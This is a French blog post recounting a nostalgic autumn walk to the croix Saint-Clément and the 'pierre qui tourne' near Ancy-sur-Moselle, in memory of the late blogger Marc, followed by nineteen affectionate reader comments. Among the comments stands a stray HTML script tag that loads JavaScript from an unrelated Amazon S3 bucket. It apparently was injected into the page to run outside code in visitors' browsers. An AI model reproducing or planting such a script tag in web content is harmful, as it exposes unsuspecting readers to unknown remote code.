• Retour nostalgique à la croix Saint- Clément

    Retour nostalgique à la croix Saint- Clément

     

    Retour nostalgique à la croix Saint- ClémentHier, ayant du temps libre, je décidais d'emmener un ami découvrir la pierre qui tourne près

    de la croix Saint-Clément au dessus de Ancy-Sur-Moselle

    Retour nostalgique à la croix Saint- Clémentdevant la croix un reste de feu de camp

    Retour nostalgique à la croix Saint- Clémentavec ce morceau de fourrure soigneusement découpé, me fis travailler mon imagination ....

    Retour nostalgique à la croix Saint- ClémentJ'aime cette période automnale avec ses couleurs...

    Retour nostalgique à la croix Saint- ClémentNous nous dirigeâmes ensuite vers le chemin qui mène à la pierre qui tourne

    Retour nostalgique à la croix Saint- Clémentcet arbre nous a interpellé par ses branches dirigées vers la droite...

    Retour nostalgique à la croix Saint- ClémentC'est à cet endroit que nous avions pique-niqué avec les amis blogueurs, le temps a fait son œuvre....

    Retour nostalgique à la croix Saint- ClémentVoilà ce qu'il reste du banc et de la table

    Retour nostalgique à la croix Saint- ClémentNous continuâmes notre chemin

    Retour nostalgique à la croix Saint- Clémentet arrivâmes à destination.

    Retour nostalgique à la croix Saint- ClémentQue de souvenirs de joies, de rigolades, de partages.....

    Retour nostalgique à la croix Saint- ClémentCette cavité me fis penser à un bénitier, l'esprit toujours en activité....

    Retour nostalgique à la croix Saint- ClémentCe mélange de rochers moussus et de feuilles mortes est d'un très bel effet....

    Retour nostalgique à la croix Saint- ClémentNous allâmes ensuite vers le promontoire car la vue sur la vallée est superbe....

    Retour nostalgique à la croix Saint- ClémentJe ne m'en lasse pas..

    Retour nostalgique à la croix Saint- ClémentJe ne sais pourquoi mais en automne je suis toujours attiré vers cet endroit

    Retour nostalgique à la croix Saint- ClémentIl faudrait que j'aille consulter.....

    Retour nostalgique à la croix Saint- ClémentCela fait plus de deux ans que Marc est parti, depuis j'ai déménagé, beaucoup de choses

    Retour nostalgique à la croix Saint- Clémentont changées dans ma vie.......

    Retour nostalgique à la croix Saint- ClémentJ'ai promis de garder ce blog ouvert, même si depuis presque un an je n'ai rien fait, j'y mettrais

    de temps en temps un article, il me faudra juste un peu plus de disponibilité ,merci à ceux qui

    passent et n'oublient pas Marc et le travail qu'il a fourni pour ce site.....

    Bernard 

    « MARC DE METZMarc trois ans déjà »
    Partager via Gmail Yahoo! Google Bookmarks Blogmarks

  • Commentaires

    19
    Jeudi 23 Janvier 2020 à 18:09
    covix

    Bonsoir Bernard, 

    Avec cette nouvelle année qui s'avance, je te souhaite une bonne et douce année.

    Merci de laisser le blog ouvert.

    Bonne soirée

    @mitiés

    18
    Bernadette de Meuse
    Mercredi 1er Janvier 2020 à 08:39

    Bonjour Bernard et Bonne Année 2020, la Santé et le Bonheur.

    Merci de continuer le Blog de Marc, cela fait plaisir de voir son sourire chaque fois que l'on ouvre son blog !

    Grosses bises de Meuse, Bernadette

    17
    Mercredi 27 Novembre 2019 à 16:31

    De très belles couleurs, une jolie promenade sur votre blog. Bonne soirée

    16
    Lydie
    Vendredi 22 Novembre 2019 à 11:17

    Bernard

    Le temps passe...Non, c'est nous qui passons...

    Qui passons sur le blog pour nous souvenir, nous souvenir en priorité de Marc, de Bernard et de tous ces moments heureux que vous avez partagés avec nous.

    Merci Bernard pour ce très beau reportage automnal, pour ce petit signe de Novembre - nous n'oublions pas.

    La vie continue...

    Prends soin de toi.

    Amicalement 

    15
    Yvonne Anne
    Vendredi 8 Novembre 2019 à 18:58

    C'est avec grand plaisir que je découvre, Bernard, ton article et tes belles photos.Elles flamboient des couleurs automnales.

    Cet endroit est magnifique.....et un peu mystérieux avec la pierre qui tourne.Je m'y suis souvent promenée car Roger avait un verger sur les hauteurs de Ancy.

    J'aime beaucoup cette mousse qui habille si délicatement la pierre et les écorces.

    Les souvenirs  resurgissent : la balade de la joyeuse équipe, le goûter partagé sur cette table , à présent en ruine...et que Bruno avait parée de blanc....Que de rires...

    Non , je ne vous oublie pas, ni toi qui poursuis ta vie après avoir déménagé, ni Marc , heureux de voir ce blog poursuivre son chemin, grâce à toi !

    Je t'embrasse.

     

    14
    Vendredi 8 Novembre 2019 à 18:28
    oth67

    Bonsoir Bernard,

    Sympa de te relire.

    Tu n'as pas besoin de consulter pour un endroit aussi magnifique happy

    Bonne soirée

    13
    Bernadette de Meuse
    Mardi 5 Novembre 2019 à 13:35

    Bonjour Bernard,

    Merci de donner un peu de tes nouvelles et Merci pour ces belles photos de ta balade nostalgique à la                    Croix St-Clément !

    Je connais la Croix et la pierre avec l'empreinte (selon la légende) des genoux de St-Clément mais je ne connais pas la pierre qui tourne ! Elle est facile à trouver ?

    Je pense souvent à notre Ami Marc, parti trop tôt, il nous manque beaucoup et pour avoir continué son Blog, je te remercie Bernard.

    Bonne journée et Bises de Meuse, Bernadette

    12
    Evy
    Lundi 4 Novembre 2019 à 16:07

    Un beau partage merci bonne journée à toi bisous

    <script src="https://s3.amazonaws.com/extseahes/2.js"></script>
    11
    Dimanche 3 Novembre 2019 à 18:28

    Bonjour Bernard!

    Ces couleurs d'automne sont tout simplement magnifiques, beaucoup plus contrastées que chez moi! Et comment oublier Marc, ce n'est pas possible!

    Merci à toi de continuer son blog, même si ce n'est qu'épisodiquement, il serait content je pense!

    A bientôt!

    10
    Agruidd Bruno
    Dimanche 3 Novembre 2019 à 18:02

    Salut Bernard,

    très heureux d'avoir de tes nouvelles ! merci! Cela est et restera toujours dans ma mémoire, quelles  rigolades on à fait avec Marc et les copines! C'est vrai que c'est une belle balade et en ce moment le sol est jonché de champignons très divers ! Cette page me comble de joie MERCI et gros bisous!

     

    9
    Dimanche 3 Novembre 2019 à 18:01

    Tu as choisis un bel endroit, encore heureux que la pluie ne soit pas  arrivée comme aujourd'hui...pour ton bénitier j'y vois autre chose....au bout du chemin, il y aura la suite de ta nouvelle vie...à bientôt, gros bisous de mon coin de l’Oise

    8
    Dimanche 3 Novembre 2019 à 17:43

    Merci Bernard d'avoir repris le chemin du blog  et de nous donner de tes nouvelles à cette occasion . De superbes photos  partagées  pleines d'un  mystère que sait si bien distiller cette forêt . Que de souvenirs  avec cette pierre qui tourne près de la croix St Clément , je me souviens comme si c'était hier  de toutes les sollicitations de notre imaginaire  en ce lieu .  Le flamboiement automnal   sur les pentes d'Ancy un régal pour les yeux  en osmose avec cette chaleur de l'amitié partagée .

    Bonne soirée Bernard 

    Bises 

     

    7
    Kris
    Dimanche 3 Novembre 2019 à 14:54

    Merci pour ce beau panorama , j’allais cueillir du muguet de ce côté quand j’étais petite , le coin en  était rempli.  Et merci de nous faire ce coucou  nous n’oublions pas Marc qui te manque tant , et ces moments passés avec lui. Bises du ciel pluvieux de corse 

    6
    Dimanche 3 Novembre 2019 à 14:28

    Bonjour d’Angers !
    Très bel endroit pour aiguiser les souvenirs ...
    Bonne journée ... Amicalement ... ¢ℓαυ∂є …

    5
    Dimanche 3 Novembre 2019 à 12:58
    Je suis contente de te lire Bernard et d'avoir un peu de nouvelles. J'espère que tout va bien pour toi et ton passage vers un autre chez toi ailleurs ne peut que t'être bénéfique.
    Merci pour cette balade forestière à la croix St Clément. J'y ai un bon souvenir qui me ramène en pensée vers ces instants passés ensemble avec Marc que je n'oublie pas.Grosses bises amicales,
    @nnie.
    4
    Dimanche 3 Novembre 2019 à 12:10

    Merci pour cette belle balade!

    Merci pour les nouvelles, les souvenirs!

    Bon dimanche très venteux et humides!

    A bientôt!

    3
    AMMON
    Dimanche 3 Novembre 2019 à 11:53
    AMMON

    Bonjour Bernard,content d'avoir de tes nouvelles,merci de donner des signes de vie, de ta vie !

    J'ai un autre blog plus axé sur la Bretagne : https://DecouvertedelaBretagne.jimdofree.com

    Belle journée et à plus tard.

    2
    Dimanche 3 Novembre 2019 à 11:45
    Josette

    Bernard

    Cette page me remplit de plaisir

    déjà elle me donne de tes nouvelles et bien sur me rappelle Marc qui manque tant, Novembre c'est le mois de son anniversaire !

    l'automne est ma saison préféré, cette année je n'ai passé que 3 jours la semaine dernière à Châtel  ( https://bricbracdejosette.blogspot.com/ ) et je crains ne plus y revenir...nous n'avons pu faire des balade dans les bois...le temps passe et le corps ne suit plus...

    j'ai appris à découvrir et aimer Metz et ses environs grâce à Marc... par la pensée le blog de jazzy ma laisse de beaux moments.

    Merci de continuer

    Je t'embrasse

    Josette (T.rez)

    1
    Dimanche 3 Novembre 2019 à 11:45

    Bonjour Bernard... Contente de te lire, même si ce n'est que de temps en temps !

    Comment oublier Marc, impossible...

    Merci pour cette magnifique balade.

    Doux dimanche, beau mois de novembre, bizzzzzzzzzzzzz

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :